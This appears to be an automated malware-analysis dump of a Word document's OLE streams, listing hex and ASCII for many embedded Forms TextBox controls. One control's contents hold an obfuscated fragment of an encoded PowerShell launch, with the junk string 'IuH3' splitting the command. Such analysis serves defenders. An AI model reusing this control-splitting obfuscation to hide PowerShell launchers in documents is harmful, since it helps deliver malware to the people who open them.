Stream Path: ObjectPool/_1630480609/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480609/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.55677964945
Base64 Encoded:	False
Data ASCII:	w . 6 . k . w . i . q . . . . . . . . .
Data Raw:	77 00 36 00 6b 00 77 00 69 00 71 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480609/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480609/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480609/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480609/contents
File Type:	data
Stream Size:	64
Entropy:	3.55239648336
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . w r u p V o i o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 77 72 75 70 56 6f 69 6f 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f

Stream Path: ObjectPool/_1630480610/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480610/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480610/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480610/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.55677964945
Base64 Encoded:	False
Data ASCII:	h . j . j . z . V . w . . . . . . . . .
Data Raw:	68 00 6a 00 6a 00 7a 00 56 00 77 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480610/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480610/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480610/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480610/contents
File Type:	data
Stream Size:	64
Entropy:	3.5759867178
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . A 1 U H A m Z o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 07 00 00 80 1a 00 00 00 1a 00 00 00 41 31 55 48 41 6d 5a 6f 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f

Stream Path: ObjectPool/_1630480611/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480611/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480611/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480611/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.65677964945
Base64 Encoded:	False
Data ASCII:	c . Z . D . u . V . z . . . . . . . . .
Data Raw:	63 00 5a 00 44 00 75 00 56 00 7a 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480611/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480611/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480611/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480611/contents
File Type:	data
Stream Size:	64
Entropy:	3.59544160058
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . K n 0 G i z u o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 07 00 00 80 1a 00 00 00 1a 00 00 00 4b 6e 30 47 69 7a 75 6f 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f

Stream Path: ObjectPool/_1630480612/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480612/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480612/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480612/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.9166422781
Base64 Encoded:	False
Data ASCII:	J . S . E . p . 1 . H . h . . . . . . .
Data Raw:	4a 00 53 00 45 00 70 00 31 00 48 00 68 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480612/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480612/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480612/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480612/contents
File Type:	data
Stream Size:	64
Entropy:	3.6384867178
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . h W h L U R B o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 08 00 00 80 1a 00 00 00 1a 00 00 00 68 57 68 4c 55 52 42 6f 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f

Stream Path: ObjectPool/_1630480613/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480613/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480613/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480613/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.65677964945
Base64 Encoded:	False
Data ASCII:	u . X . S . v . z . Y . . . . . . . . .
Data Raw:	75 00 58 00 53 00 76 00 7a 00 59 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480613/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480613/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480613/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480613/contents
File Type:	data
Stream Size:	64
Entropy:	3.62669160058
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . V U d D k j i h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 56 55 64 44 6b 6a 69 68 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68

Stream Path: ObjectPool/_1630480614/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480614/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480614/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480614/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.9166422781
Base64 Encoded:	False
Data ASCII:	G . o . W . s . R . h . k . . . . . . .
Data Raw:	47 00 6f 00 57 00 73 00 52 00 68 00 6b 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480614/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480614/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480614/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480614/contents
File Type:	data
Stream Size:	64
Entropy:	3.56419160058
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . U 5 B T r F i h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 55 35 42 54 72 46 69 68 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68

Stream Path: ObjectPool/_1630480615/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480615/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480615/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480615/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.8166422781
Base64 Encoded:	False
Data ASCII:	z . J . W . s . p . w . z . . . . . . .
Data Raw:	7a 00 4a 00 57 00 73 00 70 00 77 00 7a 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480615/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480615/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480615/contents, File Type: data, Stream Size: 92

General
Stream Path:	ObjectPool/_1630480615/contents
File Type:	data
Stream Size:	92
Entropy:	4.21099943606
Base64 Encoded:	False
Data ASCII:	. . < . . . @ . . . . . . H . , " . . . . . . . . . . . p o w e I u H 3 r s h e I u H 3 l l - I u H 3 e n c o I u H 3 d . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
Data Raw:	00 02 3c 00 01 01 40 80 00 00 00 00 1b 48 80 2c 22 00 00 80 1a 00 00 00 1a 00 00 00 70 6f 77 65 49 75 48 33 72 73 68 65 49 75 48 33 6c 6c 20 2d 49 75 48 33 65 6e 63 6f 49 75 48 33 64 20 00 00 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68

Stream Path: ObjectPool/_1630480616/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480616/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480616/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480616/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.8166422781
Base64 Encoded:	False
Data ASCII:	k . E . 4 . i . Q . Q . r . . . . . . .
Data Raw:	6b 00 45 00 34 00 69 00 51 00 51 00 72 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480616/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480616/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480616/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480616/contents
File Type:	data
Stream Size:	64
Entropy:	3.59544160058
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . q U l w A m i h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 71 55 6c 77 41 6d 69 68 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68

Stream Path: ObjectPool/_1630480617/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480617/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480617/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480617/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.65677964945
Base64 Encoded:	False
Data ASCII:	T . R . F . 9 . W . z . . . . . . . . .
Data Raw:	54 00 52 00 46 00 39 00 57 00 7a 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480617/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480617/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480617/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480617/contents
File Type:	data
Stream Size:	64
Entropy:	3.6072367178
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . W f H 3 t O j h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 07 00 00 80 1a 00 00 00 1a 00 00 00 57 66 48 33 74 4f 6a 68 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68

Stream Path: ObjectPool/_1630480618/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480618/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480618/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480618/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.65677964945
Base64 Encoded:	False
Data ASCII:	q . i . j . k . Y . G . . . . . . . . .
Data Raw:	71 00 69 00 6a 00 6b 00 59 00 47 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480618/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480618/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480618/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480618/contents
File Type:	data
Stream Size:	64
Entropy:	3.62669160058
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . V v P j m 4 i h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 56 76 50 6a 6d 34 69 68 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68

Stream Path: ObjectPool/_1630480619/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480619/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480619/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480619/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.9166422781
Base64 Encoded:	False
Data ASCII:	b . t . n . 5 . h . V . S . . . . . . .
Data Raw:	62 00 74 00 6e 00 35 00 68 00 56 00 53 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480619/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480619/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480619/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480619/contents
File Type:	data
Stream Size:	64
Entropy:	3.6072367178
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . q v k E Y l v h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 08 00 00 80 1a 00 00 00 1a 00 00 00 71 76 6b 45 59 6c 76 68 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68

Stream Path: ObjectPool/_1630480620/\x1CompObj, File Type: data, Stream Size: 116

General
Stream Path:	ObjectPool/_1630480620/\x1CompObj
File Type:	data
Stream Size:	116
Entropy:	4.74681963886
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480620/\x3OCXNAME, File Type: data, Stream Size: 20

General
Stream Path:	ObjectPool/_1630480620/\x3OCXNAME
File Type:	data
Stream Size:	20
Entropy:	1.65677964945
Base64 Encoded:	False
Data ASCII:	G . U . l . 0 . L . E . . . . . . . . .
Data Raw:	47 00 55 00 6c 00 30 00 4c 00 45 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1630480620/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1630480620/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 12 03 00 04 00

Stream Path: ObjectPool/_1630480620/\x3PRINT, File Type: data, Stream Size: 452

General
Stream Path:	ObjectPool/_1630480620/\x3PRINT
File Type:	data
Stream Size:	452
Entropy:	3.30350617225
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . i i i . . . . . . . - . . .
Data Raw:	08 00 1a 00 1a 00 00 00 01 00 09 00 00 03 de 00 00 00 05 00 1c 00 00 00 00 00 04 00 00 00 03 01 08 00 05 00 00 00 0b 02 00 00 00 00 05 00 00 00 0c 02 01 00 01 00 03 00 00 00 1e 00 07 00 00 00 fc 02 00 00 ff ff ff 00 00 00 04 00 00 00 2d 01 00 00 09 00 00 00 1d 06 21 00 f0 00 01 00 01 00 00 00 00 00 09 00 00 00 1d 06 21 00 f0 00 01 00 00 00 00 00 00 00 07 00 00 00 fc 02 00 00 a0 a0

Stream Path: ObjectPool/_1630480620/contents, File Type: data, Stream Size: 64

General
Stream Path:	ObjectPool/_1630480620/contents
File Type:	data
Stream Size:	64
Entropy:	3.6072367178
Base64 Encoded:	False
Data ASCII:	. . . . . @ . . . . . . H . , . . . . . . . . . . . . B f C z m t b M . . . . 5 . . . . . . . . . . . . . . . C a l i b r i M
Data Raw:	00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 08 00 00 80 1a 00 00 00 1a 00 00 00 42 66 43 7a 6d 74 62 4d 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 4d

Stream Path: WordDocument, File Type: data, Stream Size: 5678

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	5678
Entropy:	3.54565498894
Base64 Encoded:	False
Data ASCII:	. . . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . f . [ f f . [ f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \| . . . . . . . \| . . . . . . . \| . . . . . . . \| . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ .
